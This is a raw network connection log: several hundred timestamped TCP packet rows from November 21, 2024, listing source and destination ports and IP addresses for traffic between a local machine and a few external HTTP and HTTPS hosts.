Nov 21, 2024 13:08:11.108023882 CET	443	49706	188.114.96.3	192.168.2.5
Nov 21, 2024 13:08:11.108130932 CET	49706	443	192.168.2.5	188.114.96.3
Nov 21, 2024 13:08:11.108140945 CET	443	49706	188.114.96.3	192.168.2.5
Nov 21, 2024 13:08:11.108184099 CET	49706	443	192.168.2.5	188.114.96.3
Nov 21, 2024 13:08:11.122613907 CET	443	49706	188.114.96.3	192.168.2.5
Nov 21, 2024 13:08:11.122673035 CET	443	49706	188.114.96.3	192.168.2.5
Nov 21, 2024 13:08:11.122704029 CET	49706	443	192.168.2.5	188.114.96.3
Nov 21, 2024 13:08:11.122720003 CET	443	49706	188.114.96.3	192.168.2.5
Nov 21, 2024 13:08:11.122740984 CET	49706	443	192.168.2.5	188.114.96.3
Nov 21, 2024 13:08:11.122761011 CET	49706	443	192.168.2.5	188.114.96.3
Nov 21, 2024 13:08:11.136991978 CET	443	49706	188.114.96.3	192.168.2.5
Nov 21, 2024 13:08:11.137038946 CET	443	49706	188.114.96.3	192.168.2.5
Nov 21, 2024 13:08:11.137062073 CET	49706	443	192.168.2.5	188.114.96.3
Nov 21, 2024 13:08:11.137073040 CET	443	49706	188.114.96.3	192.168.2.5
Nov 21, 2024 13:08:11.137099981 CET	49706	443	192.168.2.5	188.114.96.3
Nov 21, 2024 13:08:11.137126923 CET	49706	443	192.168.2.5	188.114.96.3
Nov 21, 2024 13:08:11.147182941 CET	443	49706	188.114.96.3	192.168.2.5
Nov 21, 2024 13:08:11.147233009 CET	443	49706	188.114.96.3	192.168.2.5
Nov 21, 2024 13:08:11.147267103 CET	49706	443	192.168.2.5	188.114.96.3
Nov 21, 2024 13:08:11.147274017 CET	443	49706	188.114.96.3	192.168.2.5
Nov 21, 2024 13:08:11.147296906 CET	49706	443	192.168.2.5	188.114.96.3
Nov 21, 2024 13:08:11.147325993 CET	49706	443	192.168.2.5	188.114.96.3
Nov 21, 2024 13:08:11.156677008 CET	443	49706	188.114.96.3	192.168.2.5
Nov 21, 2024 13:08:11.156723976 CET	443	49706	188.114.96.3	192.168.2.5
Nov 21, 2024 13:08:11.156758070 CET	49706	443	192.168.2.5	188.114.96.3
Nov 21, 2024 13:08:11.156768084 CET	443	49706	188.114.96.3	192.168.2.5
Nov 21, 2024 13:08:11.156793118 CET	49706	443	192.168.2.5	188.114.96.3
Nov 21, 2024 13:08:11.156807899 CET	49706	443	192.168.2.5	188.114.96.3
Nov 21, 2024 13:08:11.165530920 CET	443	49706	188.114.96.3	192.168.2.5
Nov 21, 2024 13:08:11.165575981 CET	443	49706	188.114.96.3	192.168.2.5
Nov 21, 2024 13:08:11.165608883 CET	49706	443	192.168.2.5	188.114.96.3
Nov 21, 2024 13:08:11.165616035 CET	443	49706	188.114.96.3	192.168.2.5
Nov 21, 2024 13:08:11.165633917 CET	49706	443	192.168.2.5	188.114.96.3
Nov 21, 2024 13:08:11.165658951 CET	49706	443	192.168.2.5	188.114.96.3
Nov 21, 2024 13:08:11.175533056 CET	443	49706	188.114.96.3	192.168.2.5
Nov 21, 2024 13:08:11.175576925 CET	443	49706	188.114.96.3	192.168.2.5
Nov 21, 2024 13:08:11.175605059 CET	49706	443	192.168.2.5	188.114.96.3
Nov 21, 2024 13:08:11.175611019 CET	443	49706	188.114.96.3	192.168.2.5
Nov 21, 2024 13:08:11.175636053 CET	49706	443	192.168.2.5	188.114.96.3
Nov 21, 2024 13:08:11.175653934 CET	49706	443	192.168.2.5	188.114.96.3
Nov 21, 2024 13:08:11.185689926 CET	443	49706	188.114.96.3	192.168.2.5
Nov 21, 2024 13:08:11.185770988 CET	443	49706	188.114.96.3	192.168.2.5
Nov 21, 2024 13:08:11.185795069 CET	49706	443	192.168.2.5	188.114.96.3
Nov 21, 2024 13:08:11.185801983 CET	443	49706	188.114.96.3	192.168.2.5
Nov 21, 2024 13:08:11.185822010 CET	49706	443	192.168.2.5	188.114.96.3
Nov 21, 2024 13:08:11.185843945 CET	49706	443	192.168.2.5	188.114.96.3
Nov 21, 2024 13:08:11.316363096 CET	443	49706	188.114.96.3	192.168.2.5
Nov 21, 2024 13:08:11.316428900 CET	443	49706	188.114.96.3	192.168.2.5
Nov 21, 2024 13:08:11.316453934 CET	49706	443	192.168.2.5	188.114.96.3
Nov 21, 2024 13:08:11.316464901 CET	443	49706	188.114.96.3	192.168.2.5
Nov 21, 2024 13:08:11.316481113 CET	49706	443	192.168.2.5	188.114.96.3
Nov 21, 2024 13:08:11.316503048 CET	49706	443	192.168.2.5	188.114.96.3
Nov 21, 2024 13:08:11.324239016 CET	443	49706	188.114.96.3	192.168.2.5
Nov 21, 2024 13:08:11.324287891 CET	443	49706	188.114.96.3	192.168.2.5
Nov 21, 2024 13:08:11.324315071 CET	49706	443	192.168.2.5	188.114.96.3
Nov 21, 2024 13:08:11.324337959 CET	443	49706	188.114.96.3	192.168.2.5
Nov 21, 2024 13:08:11.324357033 CET	49706	443	192.168.2.5	188.114.96.3
Nov 21, 2024 13:08:11.324364901 CET	49706	443	192.168.2.5	188.114.96.3
Nov 21, 2024 13:08:11.332159996 CET	443	49706	188.114.96.3	192.168.2.5
Nov 21, 2024 13:08:11.332211018 CET	443	49706	188.114.96.3	192.168.2.5
Nov 21, 2024 13:08:11.332235098 CET	49706	443	192.168.2.5	188.114.96.3
Nov 21, 2024 13:08:11.332243919 CET	443	49706	188.114.96.3	192.168.2.5
Nov 21, 2024 13:08:11.332262039 CET	49706	443	192.168.2.5	188.114.96.3
Nov 21, 2024 13:08:11.332287073 CET	49706	443	192.168.2.5	188.114.96.3
Nov 21, 2024 13:08:11.340190887 CET	443	49706	188.114.96.3	192.168.2.5
Nov 21, 2024 13:08:11.340236902 CET	443	49706	188.114.96.3	192.168.2.5
Nov 21, 2024 13:08:11.340269089 CET	49706	443	192.168.2.5	188.114.96.3
Nov 21, 2024 13:08:11.340281963 CET	443	49706	188.114.96.3	192.168.2.5
Nov 21, 2024 13:08:11.340306997 CET	49706	443	192.168.2.5	188.114.96.3
Nov 21, 2024 13:08:11.340331078 CET	49706	443	192.168.2.5	188.114.96.3
Nov 21, 2024 13:08:11.347224951 CET	443	49706	188.114.96.3	192.168.2.5
Nov 21, 2024 13:08:11.347271919 CET	443	49706	188.114.96.3	192.168.2.5
Nov 21, 2024 13:08:11.347321033 CET	49706	443	192.168.2.5	188.114.96.3
Nov 21, 2024 13:08:11.347337008 CET	443	49706	188.114.96.3	192.168.2.5
Nov 21, 2024 13:08:11.347362041 CET	49706	443	192.168.2.5	188.114.96.3
Nov 21, 2024 13:08:11.347383976 CET	49706	443	192.168.2.5	188.114.96.3
Nov 21, 2024 13:08:11.355648041 CET	443	49706	188.114.96.3	192.168.2.5
Nov 21, 2024 13:08:11.355691910 CET	443	49706	188.114.96.3	192.168.2.5
Nov 21, 2024 13:08:11.355731010 CET	49706	443	192.168.2.5	188.114.96.3
Nov 21, 2024 13:08:11.355742931 CET	443	49706	188.114.96.3	192.168.2.5
Nov 21, 2024 13:08:11.355771065 CET	49706	443	192.168.2.5	188.114.96.3
Nov 21, 2024 13:08:11.355787992 CET	49706	443	192.168.2.5	188.114.96.3
Nov 21, 2024 13:08:11.362596035 CET	443	49706	188.114.96.3	192.168.2.5
Nov 21, 2024 13:08:11.362641096 CET	443	49706	188.114.96.3	192.168.2.5
Nov 21, 2024 13:08:11.362675905 CET	49706	443	192.168.2.5	188.114.96.3
Nov 21, 2024 13:08:11.362689018 CET	443	49706	188.114.96.3	192.168.2.5
Nov 21, 2024 13:08:11.362711906 CET	49706	443	192.168.2.5	188.114.96.3
Nov 21, 2024 13:08:11.362735033 CET	49706	443	192.168.2.5	188.114.96.3
Nov 21, 2024 13:08:11.370461941 CET	443	49706	188.114.96.3	192.168.2.5
Nov 21, 2024 13:08:11.370503902 CET	443	49706	188.114.96.3	192.168.2.5
Nov 21, 2024 13:08:11.370548964 CET	49706	443	192.168.2.5	188.114.96.3
Nov 21, 2024 13:08:11.370562077 CET	443	49706	188.114.96.3	192.168.2.5
Nov 21, 2024 13:08:11.370584965 CET	49706	443	192.168.2.5	188.114.96.3
Nov 21, 2024 13:08:11.370601892 CET	49706	443	192.168.2.5	188.114.96.3
Nov 21, 2024 13:08:11.527868986 CET	443	49706	188.114.96.3	192.168.2.5
Nov 21, 2024 13:08:11.527916908 CET	443	49706	188.114.96.3	192.168.2.5
Nov 21, 2024 13:08:11.527983904 CET	49706	443	192.168.2.5	188.114.96.3
Nov 21, 2024 13:08:11.528000116 CET	443	49706	188.114.96.3	192.168.2.5
Nov 21, 2024 13:08:11.528029919 CET	49706	443	192.168.2.5	188.114.96.3
Nov 21, 2024 13:08:11.528053999 CET	49706	443	192.168.2.5	188.114.96.3
Nov 21, 2024 13:08:11.534948111 CET	443	49706	188.114.96.3	192.168.2.5
Nov 21, 2024 13:08:11.534993887 CET	443	49706	188.114.96.3	192.168.2.5
Nov 21, 2024 13:08:11.535036087 CET	49706	443	192.168.2.5	188.114.96.3
Nov 21, 2024 13:08:11.535046101 CET	443	49706	188.114.96.3	192.168.2.5
Nov 21, 2024 13:08:11.535073996 CET	49706	443	192.168.2.5	188.114.96.3
Nov 21, 2024 13:08:11.535098076 CET	49706	443	192.168.2.5	188.114.96.3
Nov 21, 2024 13:08:11.542763948 CET	443	49706	188.114.96.3	192.168.2.5
Nov 21, 2024 13:08:11.542814016 CET	443	49706	188.114.96.3	192.168.2.5
Nov 21, 2024 13:08:11.542845011 CET	49706	443	192.168.2.5	188.114.96.3
Nov 21, 2024 13:08:11.542853117 CET	443	49706	188.114.96.3	192.168.2.5
Nov 21, 2024 13:08:11.542870045 CET	49706	443	192.168.2.5	188.114.96.3
Nov 21, 2024 13:08:11.542891979 CET	49706	443	192.168.2.5	188.114.96.3
Nov 21, 2024 13:08:11.550884962 CET	443	49706	188.114.96.3	192.168.2.5
Nov 21, 2024 13:08:11.550925970 CET	443	49706	188.114.96.3	192.168.2.5
Nov 21, 2024 13:08:11.550952911 CET	49706	443	192.168.2.5	188.114.96.3
Nov 21, 2024 13:08:11.550961971 CET	443	49706	188.114.96.3	192.168.2.5
Nov 21, 2024 13:08:11.550995111 CET	49706	443	192.168.2.5	188.114.96.3
Nov 21, 2024 13:08:11.551009893 CET	49706	443	192.168.2.5	188.114.96.3
Nov 21, 2024 13:08:11.557743073 CET	443	49706	188.114.96.3	192.168.2.5
Nov 21, 2024 13:08:11.557785988 CET	443	49706	188.114.96.3	192.168.2.5
Nov 21, 2024 13:08:11.557846069 CET	49706	443	192.168.2.5	188.114.96.3
Nov 21, 2024 13:08:11.557853937 CET	443	49706	188.114.96.3	192.168.2.5
Nov 21, 2024 13:08:11.557895899 CET	49706	443	192.168.2.5	188.114.96.3
Nov 21, 2024 13:08:11.566199064 CET	443	49706	188.114.96.3	192.168.2.5
Nov 21, 2024 13:08:11.566243887 CET	443	49706	188.114.96.3	192.168.2.5
Nov 21, 2024 13:08:11.566278934 CET	49706	443	192.168.2.5	188.114.96.3
Nov 21, 2024 13:08:11.566287041 CET	443	49706	188.114.96.3	192.168.2.5
Nov 21, 2024 13:08:11.566298962 CET	49706	443	192.168.2.5	188.114.96.3
Nov 21, 2024 13:08:11.566325903 CET	49706	443	192.168.2.5	188.114.96.3
Nov 21, 2024 13:08:11.573271036 CET	443	49706	188.114.96.3	192.168.2.5
Nov 21, 2024 13:08:11.573314905 CET	443	49706	188.114.96.3	192.168.2.5
Nov 21, 2024 13:08:11.573340893 CET	49706	443	192.168.2.5	188.114.96.3
Nov 21, 2024 13:08:11.573348999 CET	443	49706	188.114.96.3	192.168.2.5
Nov 21, 2024 13:08:11.573369026 CET	49706	443	192.168.2.5	188.114.96.3
Nov 21, 2024 13:08:11.573394060 CET	49706	443	192.168.2.5	188.114.96.3
Nov 21, 2024 13:08:11.581134081 CET	443	49706	188.114.96.3	192.168.2.5
Nov 21, 2024 13:08:11.581173897 CET	443	49706	188.114.96.3	192.168.2.5
Nov 21, 2024 13:08:11.581201077 CET	49706	443	192.168.2.5	188.114.96.3
Nov 21, 2024 13:08:11.581212044 CET	443	49706	188.114.96.3	192.168.2.5
Nov 21, 2024 13:08:11.581233025 CET	49706	443	192.168.2.5	188.114.96.3
Nov 21, 2024 13:08:11.581258059 CET	49706	443	192.168.2.5	188.114.96.3
Nov 21, 2024 13:08:11.738414049 CET	443	49706	188.114.96.3	192.168.2.5
Nov 21, 2024 13:08:11.738462925 CET	443	49706	188.114.96.3	192.168.2.5
Nov 21, 2024 13:08:11.738562107 CET	49706	443	192.168.2.5	188.114.96.3
Nov 21, 2024 13:08:11.738585949 CET	443	49706	188.114.96.3	192.168.2.5
Nov 21, 2024 13:08:11.738614082 CET	49706	443	192.168.2.5	188.114.96.3
Nov 21, 2024 13:08:11.738636017 CET	49706	443	192.168.2.5	188.114.96.3
Nov 21, 2024 13:08:11.746231079 CET	443	49706	188.114.96.3	192.168.2.5
Nov 21, 2024 13:08:11.746279001 CET	443	49706	188.114.96.3	192.168.2.5
Nov 21, 2024 13:08:11.746310949 CET	49706	443	192.168.2.5	188.114.96.3
Nov 21, 2024 13:08:11.746320009 CET	443	49706	188.114.96.3	192.168.2.5
Nov 21, 2024 13:08:11.746340036 CET	49706	443	192.168.2.5	188.114.96.3
Nov 21, 2024 13:08:11.746360064 CET	49706	443	192.168.2.5	188.114.96.3
Nov 21, 2024 13:08:11.753215075 CET	443	49706	188.114.96.3	192.168.2.5
Nov 21, 2024 13:08:11.753282070 CET	443	49706	188.114.96.3	192.168.2.5
Nov 21, 2024 13:08:11.753292084 CET	49706	443	192.168.2.5	188.114.96.3
Nov 21, 2024 13:08:11.753312111 CET	443	49706	188.114.96.3	192.168.2.5
Nov 21, 2024 13:08:11.753336906 CET	49706	443	192.168.2.5	188.114.96.3
Nov 21, 2024 13:08:11.753359079 CET	49706	443	192.168.2.5	188.114.96.3
Nov 21, 2024 13:08:11.761194944 CET	443	49706	188.114.96.3	192.168.2.5
Nov 21, 2024 13:08:11.761240005 CET	443	49706	188.114.96.3	192.168.2.5
Nov 21, 2024 13:08:11.761267900 CET	49706	443	192.168.2.5	188.114.96.3
Nov 21, 2024 13:08:11.761276007 CET	443	49706	188.114.96.3	192.168.2.5
Nov 21, 2024 13:08:11.761298895 CET	49706	443	192.168.2.5	188.114.96.3
Nov 21, 2024 13:08:11.761326075 CET	49706	443	192.168.2.5	188.114.96.3
Nov 21, 2024 13:08:11.769011974 CET	443	49706	188.114.96.3	192.168.2.5
Nov 21, 2024 13:08:11.769054890 CET	443	49706	188.114.96.3	192.168.2.5
Nov 21, 2024 13:08:11.769157887 CET	49706	443	192.168.2.5	188.114.96.3
Nov 21, 2024 13:08:11.769190073 CET	443	49706	188.114.96.3	192.168.2.5
Nov 21, 2024 13:08:11.769220114 CET	49706	443	192.168.2.5	188.114.96.3
Nov 21, 2024 13:08:11.769227028 CET	49706	443	192.168.2.5	188.114.96.3
Nov 21, 2024 13:08:11.776597977 CET	443	49706	188.114.96.3	192.168.2.5
Nov 21, 2024 13:08:11.776643038 CET	443	49706	188.114.96.3	192.168.2.5
Nov 21, 2024 13:08:11.776678085 CET	49706	443	192.168.2.5	188.114.96.3
Nov 21, 2024 13:08:11.776685953 CET	443	49706	188.114.96.3	192.168.2.5
Nov 21, 2024 13:08:11.776702881 CET	49706	443	192.168.2.5	188.114.96.3
Nov 21, 2024 13:08:11.776724100 CET	49706	443	192.168.2.5	188.114.96.3
Nov 21, 2024 13:08:11.784501076 CET	443	49706	188.114.96.3	192.168.2.5
Nov 21, 2024 13:08:11.784550905 CET	443	49706	188.114.96.3	192.168.2.5
Nov 21, 2024 13:08:11.784583092 CET	49706	443	192.168.2.5	188.114.96.3
Nov 21, 2024 13:08:11.784589052 CET	443	49706	188.114.96.3	192.168.2.5
Nov 21, 2024 13:08:11.784611940 CET	49706	443	192.168.2.5	188.114.96.3
Nov 21, 2024 13:08:11.784630060 CET	49706	443	192.168.2.5	188.114.96.3
Nov 21, 2024 13:08:11.791460037 CET	443	49706	188.114.96.3	192.168.2.5
Nov 21, 2024 13:08:11.791502953 CET	443	49706	188.114.96.3	192.168.2.5
Nov 21, 2024 13:08:11.791532040 CET	49706	443	192.168.2.5	188.114.96.3
Nov 21, 2024 13:08:11.791538000 CET	443	49706	188.114.96.3	192.168.2.5
Nov 21, 2024 13:08:11.791558981 CET	49706	443	192.168.2.5	188.114.96.3
Nov 21, 2024 13:08:11.791579962 CET	49706	443	192.168.2.5	188.114.96.3
Nov 21, 2024 13:08:11.949615002 CET	443	49706	188.114.96.3	192.168.2.5
Nov 21, 2024 13:08:11.949667931 CET	443	49706	188.114.96.3	192.168.2.5
Nov 21, 2024 13:08:11.949695110 CET	49706	443	192.168.2.5	188.114.96.3
Nov 21, 2024 13:08:11.949706078 CET	443	49706	188.114.96.3	192.168.2.5
Nov 21, 2024 13:08:11.949731112 CET	49706	443	192.168.2.5	188.114.96.3
Nov 21, 2024 13:08:11.949748993 CET	49706	443	192.168.2.5	188.114.96.3
Nov 21, 2024 13:08:11.955950022 CET	443	49706	188.114.96.3	192.168.2.5
Nov 21, 2024 13:08:11.956005096 CET	443	49706	188.114.96.3	192.168.2.5
Nov 21, 2024 13:08:11.956026077 CET	49706	443	192.168.2.5	188.114.96.3
Nov 21, 2024 13:08:11.956033945 CET	443	49706	188.114.96.3	192.168.2.5
Nov 21, 2024 13:08:11.956052065 CET	49706	443	192.168.2.5	188.114.96.3
Nov 21, 2024 13:08:11.956068039 CET	49706	443	192.168.2.5	188.114.96.3
Nov 21, 2024 13:08:11.963980913 CET	443	49706	188.114.96.3	192.168.2.5
Nov 21, 2024 13:08:11.964040995 CET	443	49706	188.114.96.3	192.168.2.5
Nov 21, 2024 13:08:11.964059114 CET	49706	443	192.168.2.5	188.114.96.3
Nov 21, 2024 13:08:11.964067936 CET	443	49706	188.114.96.3	192.168.2.5
Nov 21, 2024 13:08:11.964091063 CET	49706	443	192.168.2.5	188.114.96.3
Nov 21, 2024 13:08:11.964107990 CET	49706	443	192.168.2.5	188.114.96.3
Nov 21, 2024 13:08:11.972130060 CET	443	49706	188.114.96.3	192.168.2.5
Nov 21, 2024 13:08:11.972182035 CET	443	49706	188.114.96.3	192.168.2.5
Nov 21, 2024 13:08:11.972203970 CET	49706	443	192.168.2.5	188.114.96.3
Nov 21, 2024 13:08:11.972213030 CET	443	49706	188.114.96.3	192.168.2.5
Nov 21, 2024 13:08:11.972233057 CET	49706	443	192.168.2.5	188.114.96.3
Nov 21, 2024 13:08:11.972256899 CET	49706	443	192.168.2.5	188.114.96.3
Nov 21, 2024 13:08:11.980717897 CET	443	49706	188.114.96.3	192.168.2.5
Nov 21, 2024 13:08:11.980770111 CET	443	49706	188.114.96.3	192.168.2.5
Nov 21, 2024 13:08:11.980789900 CET	49706	443	192.168.2.5	188.114.96.3
Nov 21, 2024 13:08:11.980798960 CET	443	49706	188.114.96.3	192.168.2.5
Nov 21, 2024 13:08:11.980823994 CET	49706	443	192.168.2.5	188.114.96.3
Nov 21, 2024 13:08:11.980834961 CET	49706	443	192.168.2.5	188.114.96.3
Nov 21, 2024 13:08:11.987668037 CET	443	49706	188.114.96.3	192.168.2.5
Nov 21, 2024 13:08:11.987715006 CET	443	49706	188.114.96.3	192.168.2.5
Nov 21, 2024 13:08:11.987735033 CET	49706	443	192.168.2.5	188.114.96.3
Nov 21, 2024 13:08:11.987742901 CET	443	49706	188.114.96.3	192.168.2.5
Nov 21, 2024 13:08:11.987756014 CET	49706	443	192.168.2.5	188.114.96.3
Nov 21, 2024 13:08:11.987776041 CET	49706	443	192.168.2.5	188.114.96.3
Nov 21, 2024 13:08:11.994293928 CET	443	49706	188.114.96.3	192.168.2.5
Nov 21, 2024 13:08:11.994345903 CET	443	49706	188.114.96.3	192.168.2.5
Nov 21, 2024 13:08:11.994364977 CET	49706	443	192.168.2.5	188.114.96.3
Nov 21, 2024 13:08:11.994379044 CET	443	49706	188.114.96.3	192.168.2.5
Nov 21, 2024 13:08:11.994394064 CET	49706	443	192.168.2.5	188.114.96.3
Nov 21, 2024 13:08:11.994412899 CET	49706	443	192.168.2.5	188.114.96.3
Nov 21, 2024 13:08:12.002463102 CET	443	49706	188.114.96.3	192.168.2.5
Nov 21, 2024 13:08:12.002507925 CET	443	49706	188.114.96.3	192.168.2.5
Nov 21, 2024 13:08:12.002541065 CET	49706	443	192.168.2.5	188.114.96.3
Nov 21, 2024 13:08:12.002547979 CET	443	49706	188.114.96.3	192.168.2.5
Nov 21, 2024 13:08:12.002573013 CET	49706	443	192.168.2.5	188.114.96.3
Nov 21, 2024 13:08:12.002595901 CET	49706	443	192.168.2.5	188.114.96.3
Nov 21, 2024 13:08:12.159780025 CET	443	49706	188.114.96.3	192.168.2.5
Nov 21, 2024 13:08:12.159836054 CET	443	49706	188.114.96.3	192.168.2.5
Nov 21, 2024 13:08:12.159878969 CET	49706	443	192.168.2.5	188.114.96.3
Nov 21, 2024 13:08:12.159895897 CET	443	49706	188.114.96.3	192.168.2.5
Nov 21, 2024 13:08:12.159939051 CET	49706	443	192.168.2.5	188.114.96.3
Nov 21, 2024 13:08:12.166789055 CET	443	49706	188.114.96.3	192.168.2.5
Nov 21, 2024 13:08:12.166836023 CET	443	49706	188.114.96.3	192.168.2.5
Nov 21, 2024 13:08:12.166866064 CET	49706	443	192.168.2.5	188.114.96.3
Nov 21, 2024 13:08:12.166872978 CET	443	49706	188.114.96.3	192.168.2.5
Nov 21, 2024 13:08:12.166883945 CET	49706	443	192.168.2.5	188.114.96.3
Nov 21, 2024 13:08:12.166912079 CET	49706	443	192.168.2.5	188.114.96.3
Nov 21, 2024 13:08:12.174563885 CET	443	49706	188.114.96.3	192.168.2.5
Nov 21, 2024 13:08:12.174607992 CET	443	49706	188.114.96.3	192.168.2.5
Nov 21, 2024 13:08:12.174640894 CET	49706	443	192.168.2.5	188.114.96.3
Nov 21, 2024 13:08:12.174652100 CET	443	49706	188.114.96.3	192.168.2.5
Nov 21, 2024 13:08:12.174665928 CET	49706	443	192.168.2.5	188.114.96.3
Nov 21, 2024 13:08:12.174691916 CET	49706	443	192.168.2.5	188.114.96.3
Nov 21, 2024 13:08:12.182693005 CET	443	49706	188.114.96.3	192.168.2.5
Nov 21, 2024 13:08:12.182746887 CET	443	49706	188.114.96.3	192.168.2.5
Nov 21, 2024 13:08:12.182780027 CET	49706	443	192.168.2.5	188.114.96.3
Nov 21, 2024 13:08:12.182792902 CET	443	49706	188.114.96.3	192.168.2.5
Nov 21, 2024 13:08:12.182812929 CET	49706	443	192.168.2.5	188.114.96.3
Nov 21, 2024 13:08:12.182831049 CET	49706	443	192.168.2.5	188.114.96.3
Nov 21, 2024 13:08:12.189979076 CET	443	49706	188.114.96.3	192.168.2.5
Nov 21, 2024 13:08:12.190043926 CET	443	49706	188.114.96.3	192.168.2.5
Nov 21, 2024 13:08:12.190057039 CET	49706	443	192.168.2.5	188.114.96.3
Nov 21, 2024 13:08:12.190064907 CET	443	49706	188.114.96.3	192.168.2.5
Nov 21, 2024 13:08:12.190102100 CET	49706	443	192.168.2.5	188.114.96.3
Nov 21, 2024 13:08:12.198080063 CET	443	49706	188.114.96.3	192.168.2.5
Nov 21, 2024 13:08:12.198126078 CET	443	49706	188.114.96.3	192.168.2.5
Nov 21, 2024 13:08:12.198153019 CET	49706	443	192.168.2.5	188.114.96.3
Nov 21, 2024 13:08:12.198159933 CET	443	49706	188.114.96.3	192.168.2.5
Nov 21, 2024 13:08:12.198196888 CET	49706	443	192.168.2.5	188.114.96.3
Nov 21, 2024 13:08:12.200021029 CET	49706	443	192.168.2.5	188.114.96.3
Nov 21, 2024 13:08:12.201582909 CET	443	49706	188.114.96.3	192.168.2.5
Nov 21, 2024 13:08:12.201680899 CET	49706	443	192.168.2.5	188.114.96.3
Nov 21, 2024 13:08:12.201687098 CET	443	49706	188.114.96.3	192.168.2.5
Nov 21, 2024 13:08:12.201751947 CET	443	49706	188.114.96.3	192.168.2.5
Nov 21, 2024 13:08:12.201800108 CET	49706	443	192.168.2.5	188.114.96.3
Nov 21, 2024 13:08:12.202265024 CET	49706	443	192.168.2.5	188.114.96.3
Nov 21, 2024 13:08:56.999710083 CET	49806	80	192.168.2.5	193.122.130.0
Nov 21, 2024 13:08:57.119195938 CET	80	49806	193.122.130.0	192.168.2.5
Nov 21, 2024 13:08:57.119328976 CET	49806	80	192.168.2.5	193.122.130.0
Nov 21, 2024 13:08:57.119740009 CET	49806	80	192.168.2.5	193.122.130.0
Nov 21, 2024 13:08:57.239392042 CET	80	49806	193.122.130.0	192.168.2.5
Nov 21, 2024 13:08:58.201302052 CET	49704	80	192.168.2.5	188.114.96.3
Nov 21, 2024 13:08:58.261223078 CET	80	49806	193.122.130.0	192.168.2.5
Nov 21, 2024 13:08:58.266613007 CET	49806	80	192.168.2.5	193.122.130.0
Nov 21, 2024 13:08:58.386127949 CET	80	49806	193.122.130.0	192.168.2.5
Nov 21, 2024 13:08:58.595220089 CET	80	49806	193.122.130.0	192.168.2.5
Nov 21, 2024 13:08:58.651241064 CET	49806	80	192.168.2.5	193.122.130.0
Nov 21, 2024 13:08:58.860022068 CET	49811	443	192.168.2.5	188.114.97.3
Nov 21, 2024 13:08:58.860059023 CET	443	49811	188.114.97.3	192.168.2.5
Nov 21, 2024 13:08:58.860157967 CET	49811	443	192.168.2.5	188.114.97.3
Nov 21, 2024 13:08:58.865015030 CET	49811	443	192.168.2.5	188.114.97.3
Nov 21, 2024 13:08:58.865039110 CET	443	49811	188.114.97.3	192.168.2.5
Nov 21, 2024 13:09:00.125906944 CET	443	49811	188.114.97.3	192.168.2.5
Nov 21, 2024 13:09:00.126038074 CET	49811	443	192.168.2.5	188.114.97.3
Nov 21, 2024 13:09:00.129221916 CET	49811	443	192.168.2.5	188.114.97.3
Nov 21, 2024 13:09:00.129229069 CET	443	49811	188.114.97.3	192.168.2.5
Nov 21, 2024 13:09:00.129499912 CET	443	49811	188.114.97.3	192.168.2.5
Nov 21, 2024 13:09:00.182514906 CET	49811	443	192.168.2.5	188.114.97.3
Nov 21, 2024 13:09:00.198393106 CET	49811	443	192.168.2.5	188.114.97.3
Nov 21, 2024 13:09:00.243323088 CET	443	49811	188.114.97.3	192.168.2.5
Nov 21, 2024 13:09:00.581233978 CET	443	49811	188.114.97.3	192.168.2.5
Nov 21, 2024 13:09:00.581398964 CET	443	49811	188.114.97.3	192.168.2.5
Nov 21, 2024 13:09:00.581885099 CET	49811	443	192.168.2.5	188.114.97.3
Nov 21, 2024 13:09:00.590812922 CET	49811	443	192.168.2.5	188.114.97.3
Nov 21, 2024 13:09:00.595020056 CET	49806	80	192.168.2.5	193.122.130.0
Nov 21, 2024 13:09:00.714494944 CET	80	49806	193.122.130.0	192.168.2.5
Nov 21, 2024 13:09:02.048403025 CET	80	49806	193.122.130.0	192.168.2.5
Nov 21, 2024 13:09:02.054436922 CET	49822	443	192.168.2.5	188.114.97.3
Nov 21, 2024 13:09:02.054466963 CET	443	49822	188.114.97.3	192.168.2.5
Nov 21, 2024 13:09:02.054531097 CET	49822	443	192.168.2.5	188.114.97.3
Nov 21, 2024 13:09:02.054778099 CET	49822	443	192.168.2.5	188.114.97.3
Nov 21, 2024 13:09:02.054791927 CET	443	49822	188.114.97.3	192.168.2.5
Nov 21, 2024 13:09:02.088850021 CET	49806	80	192.168.2.5	193.122.130.0
Nov 21, 2024 13:09:03.265458107 CET	443	49822	188.114.97.3	192.168.2.5
Nov 21, 2024 13:09:03.267726898 CET	49822	443	192.168.2.5	188.114.97.3
Nov 21, 2024 13:09:03.267745018 CET	443	49822	188.114.97.3	192.168.2.5
Nov 21, 2024 13:09:03.727442026 CET	443	49822	188.114.97.3	192.168.2.5
Nov 21, 2024 13:09:03.727487087 CET	443	49822	188.114.97.3	192.168.2.5
Nov 21, 2024 13:09:03.727561951 CET	49822	443	192.168.2.5	188.114.97.3
Nov 21, 2024 13:09:03.728172064 CET	49822	443	192.168.2.5	188.114.97.3
Nov 21, 2024 13:09:03.744874954 CET	49806	80	192.168.2.5	193.122.130.0
Nov 21, 2024 13:09:03.773952007 CET	49825	80	192.168.2.5	193.122.130.0
Nov 21, 2024 13:09:03.864758968 CET	80	49806	193.122.130.0	192.168.2.5
Nov 21, 2024 13:09:03.864833117 CET	49806	80	192.168.2.5	193.122.130.0
Nov 21, 2024 13:09:03.894368887 CET	80	49825	193.122.130.0	192.168.2.5
Nov 21, 2024 13:09:03.894454002 CET	49825	80	192.168.2.5	193.122.130.0
Nov 21, 2024 13:09:03.894653082 CET	49825	80	192.168.2.5	193.122.130.0
Nov 21, 2024 13:09:04.017121077 CET	80	49825	193.122.130.0	192.168.2.5
Nov 21, 2024 13:09:05.040397882 CET	80	49825	193.122.130.0	192.168.2.5
Nov 21, 2024 13:09:05.041815996 CET	49829	443	192.168.2.5	188.114.97.3
Nov 21, 2024 13:09:05.041850090 CET	443	49829	188.114.97.3	192.168.2.5
Nov 21, 2024 13:09:05.041929007 CET	49829	443	192.168.2.5	188.114.97.3
Nov 21, 2024 13:09:05.042272091 CET	49829	443	192.168.2.5	188.114.97.3
Nov 21, 2024 13:09:05.042287111 CET	443	49829	188.114.97.3	192.168.2.5
Nov 21, 2024 13:09:05.088823080 CET	49825	80	192.168.2.5	193.122.130.0
Nov 21, 2024 13:09:06.297967911 CET	443	49829	188.114.97.3	192.168.2.5
Nov 21, 2024 13:09:06.299576044 CET	49829	443	192.168.2.5	188.114.97.3
Nov 21, 2024 13:09:06.299595118 CET	443	49829	188.114.97.3	192.168.2.5
Nov 21, 2024 13:09:06.755471945 CET	443	49829	188.114.97.3	192.168.2.5
